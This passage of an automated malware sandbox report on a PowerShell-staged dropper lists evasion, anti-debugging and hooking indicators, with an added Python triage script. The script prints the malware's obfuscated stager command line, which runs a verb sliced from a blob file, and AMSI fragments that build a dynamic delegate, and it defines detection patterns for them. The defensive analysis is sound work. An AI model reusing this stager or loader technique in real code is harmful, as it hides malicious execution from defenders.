Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FBBFF9 push ss; ret (7_2_02FBC00D)
Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FB2CB6 pushfd ; iretd (7_2_02FB2CBD)
Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FBC42A push eax; ret (7_2_02FBC42D)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034309AD push ecx; mov dword ptr [esp], ecx (8_2_034309B6)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0312537A push cs; ret (8_2_031253F2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_031232DC push ss; ret (8_2_031232DE)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03126628 push edx; retf (8_2_0312662E)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_031286E5 push cs; ret (8_2_031286EA)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_031244DE push ebx; ret (8_2_031244E5)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03125BA8 push esp; iretd (8_2_03125BAA)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03123BCB push ecx; retf (8_2_03123BD2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03123BC8 push esi; iretd (8_2_03123BCA)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03125A76 push esi; iretd (8_2_03125A85)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03125992 push ecx; retf (8_2_0312599A)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03128800 push ecx; iretd (8_2_03128806)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03123F95 push esi; iretd (8_2_03123FA6)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03126E13 push esi; retf 0000h (8_2_03126E14)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03123EE0 push edx; iretd (8_2_03123EE2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00759146 pushfd ; iretd (8_2_0075914D)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0075E2DA pushfd ; ret (8_2_0075E2DB)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe
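Two entries in this section can be checked without running the sample. The "Process created" command line reads a blob with Get-Content -raw, takes a three-character substring at a fixed offset (72152) and invokes that substring as a command with the whole blob as its argument (.$Unclog242($Skopudsningernes)), so the verb that is actually run never appears in the command line. The two "Anti Malware Scan Interface" fragments carry the reflection chain that builds a dynamic P/Invoke delegate (GetDelegateForFunctionPointer, DefineDynamicAssembly/DefineDynamicModule/DefineType), which is what the "suspicious powershell code related to unpacking or dynamic code loading" signature keys on. The Python below is an added example written for this report, not code from the report or from Joe Sandbox. It uses the command line and the two AMSI fragments exactly as printed here, a constructed stand-in for Neuralgiform.Pre (the real file is not in the report), and helper names, marker lists and scoring thresholds that are assumptions made for the example.

```python
"""Static triage of a PowerShell stager of the shape seen in this report.

Added example; helper names, thresholds and the sample blob are assumptions.
"""
import re
from typing import Optional

# Command line as printed in the report's "Process created" entry.
REPORT_CMDLINE = (
    'powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw '
    "'C:\\Users\\user\\AppData\\Roaming\\aspern\\huslejebelbs\\Medkmpede\\Neuralgiform.Pre';"
    "$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)"
)

# The two AMSI fragments as printed in the report (truncated there as well).
REPORT_AMSI_FRAGMENTS = [
    "GetDelegateForFunctionPointer((Guignol $Lacerable $gallimaufries), "
    "(Kyathoi @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))"
    "$global:Hjsderne = [AppDomain]::CurrentDomain.GetAssemblies()",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("
    "$Tilslutningspligts)), $straatktushfly).DefineDynamicModule($Suffices69, "
    "$false).DefineType($Forkasteligt, $Dictaen, [System.MulticastD",
]

# Constructed benign control: uses none of the patterns.
BENIGN_SCRIPT = "Get-ChildItem -Path C:\\Windows\\Temp | Where-Object Length -gt 1MB"

# Constructed stand-in for Neuralgiform.Pre (the real file is not in the
# report): filler up to the offset, the three characters the stager would
# extract, then more filler.
CONSTRUCTED_BLOB = "A" * 72152 + "iex" + "B" * 64

# $verb = $blob.SubString(off, len)  ...  .$verb(   or   &$verb(
STAGED_INVOKE = re.compile(
    r"\$(?P<verb>\w+)\s*=\s*\$(?P<blob>\w+)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)"
    r".*?[.&]\s*\$(?P=verb)\s*\(",
    re.IGNORECASE | re.DOTALL,
)
GET_CONTENT_PATH = re.compile(r"Get-Content\s+-raw\s+'([^']+)'", re.IGNORECASE)

# Reflection calls that together build a dynamic P/Invoke delegate. The strong
# ones are rare in administrative scripts; the weak ones only count in pairs.
STRONG_MARKERS = ("GetDelegateForFunctionPointer", "DefineDynamicAssembly")
WEAK_MARKERS = ("DefineDynamicModule", "DefineType", "GetAssemblies", "VirtualAlloc")


def find_staged_invocation(script: str) -> Optional[dict]:
    """Describe a SubString-verb invocation in `script`, or return None."""
    m = STAGED_INVOKE.search(script)
    if not m:
        return None
    path = GET_CONTENT_PATH.search(script)
    return {
        "verb_var": m.group("verb"),
        "blob_var": m.group("blob"),
        "offset": int(m.group("off")),
        "length": int(m.group("len")),
        "blob_path": path.group(1) if path else None,
    }


def resolve_staged_verb(script: str, blob_text: str) -> Optional[str]:
    """Recover the command the stager would invoke, without executing it.

    PowerShell's SubString counts UTF-16 code units and Python slices code
    points; they agree for the ASCII-range text such blobs use.
    """
    info = find_staged_invocation(script)
    if info is None:
        return None
    off, ln = info["offset"], info["length"]
    if off + ln > len(blob_text):
        return None  # blob shorter than the stager expects: wrong file or truncated
    return blob_text[off:off + ln]


def dynamic_load_markers(fragment: str) -> list:
    """Markers present in an AMSI/script-block fragment, strong ones first."""
    return [k for k in STRONG_MARKERS + WEAK_MARKERS if k in fragment]


def is_dynamic_loader(fragment: str) -> bool:
    """Any strong marker, or at least two weak ones (threshold is an assumption)."""
    found = dynamic_load_markers(fragment)
    return any(k in STRONG_MARKERS for k in found) or len(found) >= 2


if __name__ == "__main__":
    print(find_staged_invocation(REPORT_CMDLINE))
    print(resolve_staged_verb(REPORT_CMDLINE, CONSTRUCTED_BLOB))
    for frag in REPORT_AMSI_FRAGMENTS + [BENIGN_SCRIPT]:
        print(is_dynamic_loader(frag), dynamic_load_markers(frag))
```

During response, pull the file named in blob_path from the host and pass its text to resolve_staged_verb to learn which cmdlet the stager calls; the regex keys on the shape of the invocation rather than on the variable names, which differ from sample to sample, so the same check applied to 4688 command-line and 4104 script-block logs catches the pattern whether the call is made with the dot operator or with &. The marker scan is deliberately conservative: DefineType and GetAssemblies on their own are common in legitimate modules, which is why only the two strong names trigger alone.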

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; API/Special instruction interceptor: Address: 447A4F7
            Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034AD1C0 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5962
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3668
            Source: C:\Windows\SysWOW64\svchost.exe; Window / User API: threadDelayed 4052
            Source: C:\Windows\SysWOW64\svchost.exe; Window / User API: threadDelayed 5920
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; API coverage: 7.8 %
            Source: C:\Windows\SysWOW64\svchost.exe; API coverage: 3.1 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 768; Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4900; Thread sleep count: 4052 > 30
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4900; Thread sleep time: -8104000s >= -30000s
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4900; Thread sleep count: 5920 > 30
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4900; Thread sleep time: -11840000s >= -30000s
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe TID: 6028; Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\svchost.exe; Last function: Thread delayed
            Source: C:\Users\user\Desktop\Salmebogs(1).exe; Code function: 0_2_00406370 FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\Salmebogs(1).exe; Code function: 0_2_004027FB FindFirstFileW
            Source: C:\Users\user\Desktop\Salmebogs(1).exe; Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0076C660 FindFirstFileW,FindNextFileW,FindClose
            Source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ;~tAMSFT_NetEventVmNetworkAdatper.cdxmlP
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000002.00000002.3449858507.00000000054B3000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Add-NetEventVmNetworkAdapter@\
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000002.00000002.3449858507.00000000054B3000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Remove-NetEventVmNetworkAdapter@\
            Source: Stemmeurnes.exe, 00000006.00000002.3681034228.0000000006FCB000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3576788364.0000000006FCB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW1
            Source: powershell.exe, 00000002.00000002.3449858507.00000000054B3000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Get-NetEventVmNetworkAdapter@\
            Source: Stemmeurnes.exe, 00000006.00000002.3681034228.0000000006FCB000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006F78000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3576788364.0000000006FCB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Vnte.pxMSFT_NetEventVmNetworkAdatper.format.ps1xml
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\Salmebogs(1).exe; API call chain: ExitProcess graph end node graph_0-3363
            Source: C:\Users\user\Desktop\Salmebogs(1).exe; API call chain: ExitProcess graph end node graph_0-3368
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Thread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034AD1C0 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_02CED6CC LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22A702A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22A752A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22AF62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22AF62A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22AF72A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22AE92BC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22AE92BC mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22B292A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22AE0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22A9E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22B35283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22A9329E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22A702E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22B1F2F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22B352E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22A592FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22A692C5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Code function: 6_2_22A6A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0342D34C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_03505341 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_03429353 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034B035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034B035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034FA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034EF367 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034D437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_03437370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034B930B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0346A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0342C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_03450310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034F132D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0345F32A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_03427330 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034EC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0343A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034EB3D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034EF3E6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_035053FC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034403E9 mov eax, dword ptr fs:[00000030h]
